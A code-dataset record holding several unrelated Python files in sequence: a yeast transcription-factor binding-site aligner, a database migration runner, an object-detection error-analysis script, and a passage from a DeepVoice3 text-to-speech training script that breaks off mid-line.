Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"] = [Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"]]\n print(\"{}:\\t{}\".format(Resulting_Object[\"Hash\"], Resulting_Object[\"Site Counts\"]))\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Sites\"] = Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Sites\"] + Resulting_Object[\"Sites\"]\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"].append(Resulting_Object[\"Hash\"])\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"] = {k: Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"].get(k, 0) + Resulting_Object[\"Site Counts\"].get(k, 0) for k in set(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"]) | set(Resulting_Object[\"Site Counts\"])}\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Index\"] = sum(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"].values())/len(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Promoter\"])\n else:\n Result_Dictionary[SUBUNIT[\"SubUnit\"]] = Resulting_Object\n\n for Pathway_Key in Pathway_Dictionary.keys():\n for Enzyme_Key in Pathway_Dictionary[Pathway_Key].keys():\n for SubUnit_Key in Pathway_Dictionary[Pathway_Key][Enzyme_Key].keys():\n Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key] = Result_Dictionary[SubUnit_Key]\n \n for Pathway_Key in Pathway_Dictionary.keys():\n Pathway_Sites_Dict = {}\n Pathway_Common_Keys = []\n for Enzyme_Key in Pathway_Dictionary[Pathway_Key].keys():\n Enzyme_Sites_Dict = {}\n Enzyme_Common_Keys = []\n for SubUnit_Key in Pathway_Dictionary[Pathway_Key][Enzyme_Key].keys():\n Pathway_Sites_Dict[SubUnit_Key] = (Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key][\"Site Counts\"])\n Enzyme_Sites_Dict[SubUnit_Key] = (Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key][\"Site Counts\"])\n Enzyme_Key_Frequency = measure_key_frequency(Enzyme_Sites_Dict)\n for Key in Enzyme_Key_Frequency:\n if Enzyme_Key_Frequency[Key] >= len(Enzyme_Sites_Dict)*0.15:\n Enzyme_Common_Keys.append([Key , Enzyme_Key_Frequency[Key]/len(Enzyme_Sites_Dict)])\n EnzymeResult_Writer.writerow([Pathway_Key, Enzyme_Key, Enzyme_Common_Keys])\n\n Pathway_Key_Frequency = measure_key_frequency(Pathway_Sites_Dict)\n for Key in Pathway_Key_Frequency:\n if Pathway_Key_Frequency[Key] >= len(Pathway_Sites_Dict)*0.15:\n Pathway_Common_Keys.append([Key, Pathway_Key_Frequency[Key]/len(Pathway_Sites_Dict)])\n PathwayResult_Writer.writerow([Pathway_Key, Pathway_Common_Keys])\n\n tf_Dict = {}\n for Key in Result_Dictionary.values():\n SubResult_Writer.writerow(list(Key.values()))\n for Site in Key[\"Sites\"]:\n if Site[\"Site_ID\"] in tf_Dict.keys():\n if type(Site[\"Site_Sequence\"]) == str:\n correctedSq = reverseComplement(Site[\"Site_Sequence\"]) if Site[\"Reverse_Complement\"] == 1 else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]].append(correctedSq)\n else:\n correctedSq = [reverseComplement(Sq) for Sq in Site[\"Site_Sequence\"]] if Site[\"Reverse_Complement\"] == 1 else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]] = tf_Dict[Site[\"Site_ID\"]] + correctedSq\n else:\n Site_Sequence_List = [Site[\"Site_Sequence\"]] if type(Site[\"Site_Sequence\"]) == str else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]] = [reverseComplement(Sq) for Sq in Site_Sequence_List] if Site[\"Reverse_Complement\"] == 1 else Site_Sequence_List\n \n tf_Matrix_Dict = {}\n for Key in tf_Dict.keys():\n seqList = tf_Dict[Key]\n fm = []\n for i in range(len(seqList[0])):\n fm.append({'A':0, 'C':0, 'T':0, 'G':0})\n for site in seqList:\n site = site.upper()\n fm[i][site[i]] = fm[i][site[i]] + 1\n tf_Matrix_Dict[Key] = fm\n\n with open(\"site.txt\",\"w\") as siteRes:\n for Key in tf_Matrix_Dict.keys():\n siteRes.write(\"> \" + Key + \"\\n\")\n for base in [\"A\",\"C\",\"G\",\"T\"]:\n siteRes.write(base + \" [\")\n for loc in tf_Matrix_Dict[Key]:\n digit = loc[base]\n siteRes.write(\"{:>6}\".format(digit))\n siteRes.write(\" ]\\n\")\n siteRes.write(\"\\n\")\n\n with open(\"targetTFs.txt\",\"w\") as targetTFs:\n for Key in [\"ADR1\", \"CAT8\", \"SIP4\", \"HAP234\", \"RDS2\", \"YBR239C\", \n \"STB5\", \"MSN2\", \"MSN4\", \"MIG1\", \"TYE7\", \"GCR1\"]:\n if Key in tf_Dict.keys(): \n targetTFs.write(\"{} \\n\".format(Key))\n for SiteSequence in tf_Dict[Key]:\n targetTFs.write(\"{} \\n\".format(SiteSequence))\n else:\n continue\n\n end = time.time()\n print(\"Run Time: %.3f\" %(end-start))\n", "repo_name": "Biocatalysis-CHE-METU/TFBS-Analysis-of-Pichia-pastoris", "sub_path": "Searching Algorithm/Aligner.py", "file_name": "Aligner.py", "file_ext": "py", "file_size_in_byte": 18832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.pairwise2.align.globalms", "line_number": 32, "usage_type": "call"}, {"api_name": "Bio.pairwise2.align", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Bio.pairwise2", "line_number": 32, "usage_type": "name"}, {"api_name": "re.finditer", "line_number": 69, "usage_type": "call"}, {"api_name": "Bio.motifs.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "Bio.motifs", "line_number": 104, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 129, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 154, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 179, "usage_type": "call"}, {"api_name": "time.time", "line_number": 212, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 220, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 222, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 224, "usage_type": "call"}, {"api_name": "time.time", "line_number": 322, "usage_type": "call"}]} +{"seq_id": "32006517156", "text": "import argparse\n\nfrom migration.config import (\n document_cfgs,\n source_db_cfg,\n destination_db_cfg,\n internal_db_cfg,\n)\nfrom migration.migration_utility.configuration.db_configuration import DbConfigurator\nfrom migration.migration_utility.configuration.document_configuration import (\n DocumentConfiguration,\n)\nfrom migration.migration_utility.controller.migration_controller import (\n MigrationController,\n)\nimport sys\n\n\ndef main(\n reset_migration: bool = False,\n force_migration: bool = False,\n flow: str = \"flat\"\n):\n \"\"\"main.\"\"\"\n\n document_config_models = [DocumentConfiguration(**cfg) for cfg in document_cfgs]\n source_db_cfg_model = DbConfigurator(**source_db_cfg)\n destination_db_cfg_model = DbConfigurator(**destination_db_cfg)\n internal_db_cfg_model = DbConfigurator(**internal_db_cfg)\n\n migration_ctrl = MigrationController(\n source_db_config=source_db_cfg_model,\n destination_db_config=destination_db_cfg_model,\n internal_db_config=internal_db_cfg_model,\n document_configs=document_config_models,\n flow=flow\n )\n\n migration_ctrl.migrate(reset_migration=reset_migration, force_migration=force_migration)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--reset\", action=\"store_true\", help=\"Resets all previously migrated documents to is_migrated=True state\")\n parser.add_argument(\"--force\", action=\"store_true\", help=\"Forces a repeated migration over all documents\")\n parser.add_argument(\"--id_list_path\", default=None, help=\"Path to a file with list of IDs to migrate\")\n parser.add_argument(\"--flow\", default=\"flat\", help=\"Specifies the migration flow\")\n\n args = parser.parse_args()\n\n main(\n reset_migration=args.reset,\n force_migration=args.force,\n flow=args.flow\n )\n", "repo_name": "tigrankh/migration", "sub_path": "migration/migrate.py", "file_name": "migrate.py", "file_ext": "py", "file_size_in_byte": 1860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "migration.migration_utility.configuration.document_configuration.DocumentConfiguration", "line_number": 26, "usage_type": "call"}, {"api_name": "migration.config.document_cfgs", "line_number": 26, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 27, "usage_type": "call"}, {"api_name": "migration.config.source_db_cfg", "line_number": 27, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 28, "usage_type": "call"}, {"api_name": "migration.config.destination_db_cfg", "line_number": 28, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 29, "usage_type": "call"}, {"api_name": "migration.config.internal_db_cfg", "line_number": 29, "usage_type": "name"}, {"api_name": "migration.migration_utility.controller.migration_controller.MigrationController", "line_number": 31, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "30298996547", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom PIL.ImageDraw import Draw\nfrom PIL import Image, ImageFont\nimport matplotlib.pyplot as plt\nimport os\nimport xml.etree.ElementTree as ET\nfrom os import listdir\nfrom os.path import isfile, join\nimport torch\nimport numpy as np\nimport pdb\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\n\ndef preprocess_annotation(target):\n boxes = []\n gt_classes = []\n difficult_boxes = []\n TO_REMOVE = 1\n\n for obj in target.iter(\"object\"):\n difficult = int(obj.find(\"difficult\").text) == 1\n if difficult:\n continue\n name = obj.find(\"name\").text.lower().strip()\n bb = obj.find(\"bndbox\")\n # Make pixel indexes 0-based\n # Refer to \"https://github.com/rbgirshick/py-faster-rcnn/blob/master/lib/datasets/pascal_voc.py#L208-L211\"\n box = [\n bb.find(\"xmin\").text,\n bb.find(\"ymin\").text,\n bb.find(\"xmax\").text,\n bb.find(\"ymax\").text,\n ]\n bndbox = tuple(\n map(lambda x: x - TO_REMOVE, list(map(int, box)))\n )\n\n boxes.append(bndbox)\n gt_classes.append(name)\n difficult_boxes.append(difficult)\n\n size = target.find(\"size\")\n im_info = tuple(map(int, (size.find(\"height\").text, size.find(\"width\").text)))\n\n res = {\n \"boxes\": torch.tensor(boxes, dtype=torch.float32),\n \"labels\": gt_classes,\n \"difficult\": torch.tensor(difficult_boxes),\n \"im_info\": im_info,\n }\n return res\n\ndef boxlist_iou(boxList1, boxList2):\n #INTERSEZIONE\n\n if boxList1.size != boxList2.size:\n raise RuntimeError(\"boxlists should have the same image size, got {}, {}\".format(boxList1, boxList2))\n\n boxList1 = boxList1.convert(\"xyxy\")\n boxList2 = boxList2.convert(\"xyxy\")\n\n area1 = boxList1.area()\n area2 = boxList2.area()\n\n box1, box2 = boxList1.bbox, boxList2.bbox\n\n lt = torch.max(box1[:, None, :2], box2[:, :2]) # [N,M,2]\n rb = torch.min(box1[:, None, 2:], box2[:, 2:]) # [N,M,2]\n\n TO_REMOVE = 1\n\n wh = (rb - lt + TO_REMOVE).clamp(min=0) # [N,M,2]\n inter = wh[:, :, 0] * wh[:, :, 1] # [N,M]\n ###############\n #AREA \n #area1 = (boxList1[:, 2] - boxList1[:, 0] + TO_REMOVE) * (boxList1[:, 3] - boxList1[:, 1] + TO_REMOVE)\n #area2 = (boxList2[:, 2] - boxList2[:, 0] + TO_REMOVE) * (boxList2[:, 3] - boxList2[:, 1] + TO_REMOVE)\n #IoU\n iou = inter / (area1[:, None] + area2 - inter)\n \n return iou\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target', type=str, help='Dataset root dir')\nparser.add_argument('--detections', type=str, help=\"Saved Detections .pth file\")\nparser.add_argument('--anno_path', type=str, help='Path to annotations .xml')\nparser.add_argument('--n_most_conf', type=int, default=2000, help='Number of most confidence predictions to condider for the Error Analysis')\nparser.add_argument('--subset_classes', nargs='+', help=\"List of classes to consider\")\nargs = parser.parse_args()\n\nvoc_classes = [\"__background__\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n\ncityscapes_classes = [\"__background__ \",\"person\",\"rider\",\"car\",\"truck\",\"bus\",\"train\",\"motorcycle\",\"bicycle\"]\n\n\nclasses = voc_classes\n\nif args.subset_classes is not None:\n sub_set_classes = args.subset_classes\nelse:\n sub_set_classes = classes\n\ndetections = torch.load(open(args.detections, 'rb'))\n\nlines = open(os.path.join(args.target, 'ImageSets', 'Main', 'test.txt'), 'r').readlines()\nlines = [l.strip() for l in lines]\n\nassert len(lines) == len(detections)\n\nall_info = [] \n\nfor i in range(len(lines)): \n\n if (detections[i].bbox.shape[0] == 0):\n #questo caso significa che per quella immagine non ci sono predizioni della rete, cioè FN)\n continue\n\n\n annotations = ET.parse(args.anno_path + lines[i] +'.xml').getroot()\n immage_info = preprocess_annotation(annotations)\n\n if (immage_info[\"boxes\"].shape[0] == 0):\n #caso penso impossibile, cioè ground-truth image without bbox\n continue\n\n\n im_height, im_width = immage_info[\"im_info\"]\n detections[i] = detections[i].resize((im_width, im_height))\n\n detections[i].bbox[:, 2:] += 1\n immage_info[\"boxes\"][:, 2:] += 1\n\n iou_res = boxlist_iou(BoxList(detections[i].bbox.numpy(),(im_width, im_height)), BoxList(immage_info[\"boxes\"].numpy(), (im_width, im_height))).numpy()\n\n gt_index = iou_res.argmax(axis=1)\n iou_with_gt = iou_res.max(axis=1)\n\n del iou_res\n\n\n for k in range(len(detections[i].extra_fields['labels'])):\n\n temp_dict = {}\n temp_dict[f\"{i}_{k}\"] = k\n temp_dict[\"label_p\"] = classes[detections[i].extra_fields['labels'][k]]\n\n temp_dict[\"label_gt\"] = immage_info[\"labels\"][gt_index[k]]\n temp_dict[\"score\"] = detections[i].extra_fields['scores'].numpy()[k]\n temp_dict[\"iou_gt\"] = iou_with_gt[k]\n\n if temp_dict[\"label_gt\"] in sub_set_classes:\n all_info.append(temp_dict)\n\n\n\ndef take_score(elem):\n return elem[\"score\"]\n\nall_info_sort = sorted(all_info, key=take_score, reverse=True)\n\n#ERROR ANALYSIS\n\n#prendo i primi 1000 most confidence predictions\nn_most_conf = args.n_most_conf \nall_info_sort = all_info_sort[:n_most_conf]\n#print(all_info_sort)\n\ncorrect = 0\nmisloc = 0\nbackgr = 0\ncounter = 0\n\nfor el in all_info_sort:\n\n if el[\"label_p\"] == el[\"label_gt\"]:\n\n if el[\"iou_gt\"] < 0.3:\n backgr += 1\n elif el[\"iou_gt\"] >= 0.5:\n correct += 1\n else:\n misloc += 1\n else:\n backgr += 1\n\n counter += 1\n\nprint(f\"Correct detections: {(correct/counter)*100:.2f}%\")\nprint(f\"Mislocalization Error: {(misloc/counter)*100:.2f}%\")\nprint(f\"Background Error: {(backgr/counter)*100:.2f}%\")\nprint(counter)\n\n", "repo_name": "FrancescoCappio/DL_utils", "sub_path": "Object_detection_error_analysis/error_analysis_with_BoxList.py", "file_name": "error_analysis_with_BoxList.py", "file_ext": "py", "file_size_in_byte": 5879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 73, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 126, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 126, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.structures.bounding_box.BoxList", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "40344938698", "text": "\"\"\"Trainining script for seq2seq text-to-speech synthesis model.\n\nusage: train.py [options]\n\noptions:\n --data-root= Directory contains preprocessed features.\n --checkpoint-dir= Directory where to save model checkpoints [default: checkpoints].\n --hparams= Hyper parameters [default: ].\n --preset= Path of preset parameters (json).\n --checkpoint= Restore model from checkpoint path if given.\n --checkpoint-seq2seq= Restore seq2seq model from checkpoint path.\n --checkpoint-postnet= Restore postnet model from checkpoint path.\n --train-seq2seq-only Train only seq2seq model.\n --train-postnet-only Train only postnet model.\n --restore-parts= Restore part of the model.\n --log-event-path= Log event path.\n --reset-optimizer Reset optimizer.\n --load-embedding= Load embedding from checkpoint.\n --speaker-id= Use specific speaker of data in case for multi-speaker datasets.\n -h, --help Show this help message and exit\n\"\"\"\nfrom docopt import docopt\n\nimport sys\nimport gc\nimport platform\nfrom os.path import dirname, join\nfrom tqdm import tqdm, trange\nfrom datetime import datetime\n\n# The deepvoice3 model\nfrom deepvoice3_pytorch import frontend, builder\nimport audio\nimport lrschedule\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.backends.cudnn as cudnn\nfrom torch.utils import data as data_utils\nfrom torch.utils.data.sampler import Sampler\nimport numpy as np\nfrom numba import jit\n\nfrom nnmnkwii.datasets import FileSourceDataset, FileDataSource\nfrom os.path import join, expanduser\nimport random\n\nimport librosa.display\nfrom matplotlib import pyplot as plt\nimport sys\nimport os\nfrom tensorboardX import SummaryWriter\nfrom matplotlib import cm\nfrom warnings import warn\nfrom hparams import hparams, hparams_debug_string\n\nglobal_step = 0\nglobal_epoch = 0\nuse_cuda = torch.cuda.is_available()\nif use_cuda:\n cudnn.benchmark = False\n\n_frontend = None # to be set later\n\n\ndef _pad(seq, max_len, constant_values=0):\n return np.pad(seq, (0, max_len - len(seq)),\n mode='constant', constant_values=constant_values)\n\n\ndef _pad_2d(x, max_len, b_pad=0):\n x = np.pad(x, [(b_pad, max_len - len(x) - b_pad), (0, 0)],\n mode=\"constant\", constant_values=0)\n return x\n\n\ndef plot_alignment(alignment, path, info=None):\n fig, ax = plt.subplots()\n im = ax.imshow(\n alignment,\n aspect='auto',\n origin='lower',\n interpolation='none')\n fig.colorbar(im, ax=ax)\n xlabel = 'Decoder timestep'\n if info is not None:\n xlabel += '\\n\\n' + info\n plt.xlabel(xlabel)\n plt.ylabel('Encoder timestep')\n plt.tight_layout()\n plt.savefig(path, format='png')\n plt.close()\n\n\nclass TextDataSource(FileDataSource):\n def __init__(self, data_root, speaker_id=None):\n self.data_root = data_root\n self.speaker_ids = None\n self.multi_speaker = False\n # If not None, filter by speaker_id\n self.speaker_id = speaker_id\n\n def collect_files(self):\n meta = join(self.data_root, \"train.txt\")\n with open(meta, \"rb\") as f:\n lines = f.readlines()\n l = lines[0].decode(\"utf-8\").split(\"|\")\n assert len(l) == 4 or len(l) == 5\n self.multi_speaker = len(l) == 5\n texts = list(map(lambda l: l.decode(\"utf-8\").split(\"|\")[3], lines))\n if self.multi_speaker:\n speaker_ids = list(map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[-1]), lines))\n # Filter by speaker_id\n # using multi-speaker dataset as a single speaker dataset\n if self.speaker_id is not None:\n indices = np.array(speaker_ids) == self.speaker_id\n texts = list(np.array(texts)[indices])\n self.multi_speaker = False\n return texts\n\n return texts, speaker_ids\n else:\n return texts\n\n def collect_features(self, *args):\n if self.multi_speaker:\n text, speaker_id = args\n else:\n text = args[0]\n global _frontend\n if _frontend is None:\n _frontend = getattr(frontend, hparams.frontend)\n seq = _frontend.text_to_sequence(text, p=hparams.replace_pronunciation_prob)\n\n if platform.system() == \"Windows\":\n if hasattr(hparams, 'gc_probability'):\n _frontend = None # memory leaking prevention in Windows\n if np.random.rand() < hparams.gc_probability:\n gc.collect() # garbage collection enforced\n print(\"GC done\")\n\n if self.multi_speaker:\n return np.asarray(seq, dtype=np.int32), int(speaker_id)\n else:\n return np.asarray(seq, dtype=np.int32)\n\n\nclass _NPYDataSource(FileDataSource):\n def __init__(self, data_root, col, speaker_id=None):\n self.data_root = data_root\n self.col = col\n self.frame_lengths = []\n self.speaker_id = speaker_id\n\n def collect_files(self):\n meta = join(self.data_root, \"train.txt\")\n with open(meta, \"rb\") as f:\n lines = f.readlines()\n l = lines[0].decode(\"utf-8\").split(\"|\")\n assert len(l) == 4 or len(l) == 5\n multi_speaker = len(l) == 5\n self.frame_lengths = list(\n map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[2]), lines))\n\n paths = list(map(lambda l: l.decode(\"utf-8\").split(\"|\")[self.col], lines))\n paths = list(map(lambda f: join(self.data_root, f), paths))\n\n if multi_speaker and self.speaker_id is not None:\n speaker_ids = list(map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[-1]), lines))\n # Filter by speaker_id\n # using multi-speaker dataset as a single speaker dataset\n indices = np.array(speaker_ids) == self.speaker_id\n paths = list(np.array(paths)[indices])\n self.frame_lengths = list(np.array(self.frame_lengths)[indices])\n # aha, need to cast numpy.int64 to int\n self.frame_lengths = list(map(int, self.frame_lengths))\n\n return paths\n\n def collect_features(self, path):\n return np.load(path)\n\n\nclass MelSpecDataSource(_NPYDataSource):\n def __init__(self, data_root, speaker_id=None):\n super(MelSpecDataSource, self).__init__(data_root, 1, speaker_id)\n\n\nclass LinearSpecDataSource(_NPYDataSource):\n def __init__(self, data_root, speaker_id=None):\n super(LinearSpecDataSource, self).__init__(data_root, 0, speaker_id)\n\n\nclass PartialyRandomizedSimilarTimeLengthSampler(Sampler):\n \"\"\"Partially randmoized sampler\n\n 1. Sort by lengths\n 2. Pick a small patch and randomize it\n 3. Permutate mini-batchs\n \"\"\"\n\n def __init__(self, lengths, batch_size=16, batch_group_size=None,\n permutate=True):\n self.lengths, self.sorted_indices = torch.sort(torch.LongTensor(lengths))\n self.batch_size = batch_size\n if batch_group_size is None:\n batch_group_size = min(batch_size * 32, len(self.lengths))\n if batch_group_size % batch_size != 0:\n batch_group_size -= batch_group_size % batch_size\n\n self.batch_group_size = batch_group_size\n assert batch_group_size % batch_size == 0\n self.permutate = permutate\n\n def __iter__(self):\n indices = self.sorted_indices.clone()\n batch_group_size = self.batch_group_size\n s, e = 0, 0\n for i in range(len(indices) // batch_group_size):\n s = i * batch_group_size\n e = s + batch_group_size\n random.shuffle(indices[s:e])\n\n # Permutate batches\n if self.permutate:\n perm = np.arange(len(indices[:e]) // self.batch_size)\n random.shuffle(perm)\n indices[:e] = indices[:e].view(-1, self.batch_size)[perm, :].view(-1)\n\n # Handle last elements\n s += batch_group_size\n if s < len(indices):\n random.shuffle(indices[s:])\n\n return iter(indices)\n\n def __len__(self):\n return len(self.sorted_indices)\n\n\nclass PyTorchDataset(object):\n def __init__(self, X, Mel, Y):\n self.X = X\n self.Mel = Mel\n self.Y = Y\n # alias\n self.multi_speaker = X.file_data_source.multi_speaker\n\n def __getitem__(self, idx):\n if self.multi_speaker:\n text, speaker_id = self.X[idx]\n return text, self.Mel[idx], self.Y[idx], speaker_id\n else:\n return self.X[idx], self.Mel[idx], self.Y[idx]\n\n def __len__(self):\n return len(self.X)\n\n\ndef sequence_mask(sequence_length, max_len=None):\n if max_len is None:\n max_len = sequence_length.data.max()\n batch_size = sequence_length.size(0)\n seq_range = torch.arange(0, max_len).long()\n seq_range_expand = seq_range.unsqueeze(0).expand(batch_size, max_len)\n if sequence_length.is_cuda:\n seq_range_expand = seq_range_expand.cuda()\n seq_length_expand = sequence_length.unsqueeze(1) \\\n .expand_as(seq_range_expand)\n return (seq_range_expand < seq_length_expand).float()\n\n\nclass MaskedL1Loss(nn.Module):\n def __init__(self):\n super(MaskedL1Loss, self).__init__()\n self.criterion = nn.L1Loss(reduction=\"sum\")\n\n def forward(self, input, target, lengths=None, mask=None, max_len=None):\n if lengths is None and mask is None:\n raise RuntimeError(\"Should provide either lengths or mask\")\n\n # (B, T, 1)\n if mask is None:\n mask = sequence_mask(lengths, max_len).unsqueeze(-1)\n\n # (B, T, D)\n mask_ = mask.expand_as(input)\n loss = self.criterion(input * mask_, target * mask_)\n return loss / mask_.sum()\n\n\ndef collate_fn(batch):\n \"\"\"Create batch\"\"\"\n r = hparams.outputs_per_step\n downsample_step = hparams.downsample_step\n multi_speaker = len(batch[0]) == 4\n\n # Lengths\n input_lengths = [len(x[0]) for x in batch]\n max_input_len = max(input_lengths)\n\n target_lengths = [len(x[1]) for x in batch]\n\n max_target_len = max(target_lengths)\n if max_target_len % r != 0:\n max_target_len += r - max_target_len % r\n assert max_target_len % r == 0\n if max_target_len % downsample_step != 0:\n max_target_len += downsample_step - max_target_len % downsample_step\n assert max_target_len % downsample_step == 0\n\n # Set 0 for zero beginning padding\n # imitates initial decoder states\n b_pad = r\n max_target_len += b_pad * downsample_step\n\n a = np.array([_pad(x[0], max_input_len) for x in batch], dtype=np.int)\n x_batch = torch.LongTensor(a)\n\n input_lengths = torch.LongTensor(input_lengths)\n target_lengths = torch.LongTensor(target_lengths)\n\n b = np.array([_pad_2d(x[1], max_target_len, b_pad=b_pad) for x in batch],\n dtype=np.float32)\n mel_batch = torch.FloatTensor(b)\n\n c = np.array([_pad_2d(x[2], max_target_len, b_pad=b_pad) for x in batch],\n dtype=np.float32)\n y_batch = torch.FloatTensor(c)\n\n # text positions\n text_positions = np.array([_pad(np.arange(1, len(x[0]) + 1), max_input_len)\n for x in batch], dtype=np.int)\n text_positions = torch.LongTensor(text_positions)\n\n max_decoder_target_len = max_target_len // r // downsample_step\n\n # frame positions\n s, e = 1, max_decoder_target_len + 1\n # if b_pad > 0:\n # s, e = s - 1, e - 1\n # NOTE: needs clone to supress RuntimeError in dataloarder...\n # ref: https://github.com/pytorch/pytorch/issues/10756\n frame_positions = torch.arange(s, e).long().unsqueeze(0).expand(\n len(batch), max_decoder_target_len).clone()\n\n # done flags\n done = np.array([_pad(np.zeros(len(x[1]) // r // downsample_step - 1),\n max_decoder_target_len, constant_values=1)\n for x in batch])\n done = torch.FloatTensor(done).unsqueeze(-1)\n\n if multi_speaker:\n speaker_ids = torch.LongTensor([x[3] for x in batch])\n else:\n speaker_ids = None\n\n return x_batch, input_lengths, mel_batch, y_batch, \\\n (text_positions, frame_positions), done, target_lengths, speaker_ids\n\n\ndef time_string():\n return datetime.now().strftime('%Y-%m-%d %H:%M')\n\n\ndef save_alignment(path, attn):\n plot_alignment(attn.T, path, info=\"{}, {}, step={}\".format(\n hparams.builder, time_string(), global_step))\n\n\ndef prepare_spec_image(spectrogram):\n # [0, 1]\n spectrogram = (spectrogram - np.min(spectrogram)) / (np.max(spectrogram) - np.min(spectrogram))\n spectrogram = np.flip(spectrogram, axis=1) # flip against freq axis\n return np.uint8(cm.magma(spectrogram.T) * 255)\n\n\ndef eval_model(global_step, writer, device, model, checkpoint_dir, ismultispeaker):\n # harded coded\n texts = [\n \"Scientists at the CERN laboratory say they have discovered a new particle.\",\n \"There's a way to measure the acute emotional intelligence that has never gone out of style.\",\n \"President Trump met with other leaders at the Group of 20 conference.\",\n \"Generative adversarial network or variational auto-encoder.\",\n \"Please call Stella.\",\n \"Some have accepted this as a miracle without any physical explanation.\",\n ]\n import synthesis\n synthesis._frontend = _frontend\n\n eval_output_dir = join(checkpoint_dir, \"eval\")\n os.makedirs(eval_output_dir, exist_ok=True)\n\n # Prepare model for evaluation\n model_eval = build_model().to(device)\n model_eval.load_state_dict(model.state_dict())\n\n # hard coded\n speaker_ids = [0, 1, hparams.n_speakers-1] if ismultispeaker else [None]\n for speaker_id in speaker_ids:\n speaker_str = \"multispeaker{}\".format(speaker_id) if speaker_id is not None else \"single\"\n\n for idx, text in enumerate(texts):\n signal, alignment, _, mel = synthesis.tts(\n model_eval, text, p=0, speaker_id=speaker_id, fast=True)\n signal /= np.max(np.abs(signal))\n\n # Alignment\n path = join(eval_output_dir, \"step{:09d}_text{}_{}_alignment.png\".format(\n global_step, idx, speaker_str))\n save_alignment(path, alignment)\n tag = \"eval_averaged_alignment_{}_{}\".format(idx, speaker_str)\n try:\n writer.add_image(tag, np.uint8(cm.viridis(np.flip(alignment, 1).T) * 255), global_step)\n except Exception as e:\n warn(str(e))\n\n # Mel\n try:\n writer.add_image(\"(Eval) Predicted mel spectrogram text{}_{}\".format(idx, speaker_str),\n prepare_spec_image(mel), global_step)\n except Exception as e:\n warn(str(e))\n\n # Audio\n path = join(eval_output_dir, \"step{:09d}_text{}_{}_predicted.wav\".format(\n global_step, idx, speaker_str))\n audio.save_wav(signal, path)\n\n try:\n writer.add_audio(\"(Eval) Predicted audio signal {}_{}\".format(idx, speaker_str),\n signal, global_step, sample_rate=hparams.sample_rate)\n except Exception as e:\n warn(str(e))\n pass\n\n\ndef save_states(global_step, writer, mel_outputs, linear_outputs, attn, mel, y,\n input_lengths, checkpoint_dir=None):\n print(\"Save intermediate states at step {}\".format(global_step))\n\n # idx = np.random.randint(0, len(input_lengths))\n idx = min(1, len(input_lengths) - 1)\n input_length = input_lengths[idx]\n\n # Alignment\n # Multi-hop attention\n if attn is not None and attn.dim() == 4:\n for i, alignment in enumerate(attn):\n alignment = alignment[idx].cpu().data.numpy()\n tag = \"alignment_layer{}\".format(i + 1)\n try:\n writer.add_image(tag, np.uint8(cm.viridis(\n np.flip(alignment, 1).T) * 255), global_step)\n # save files as well for 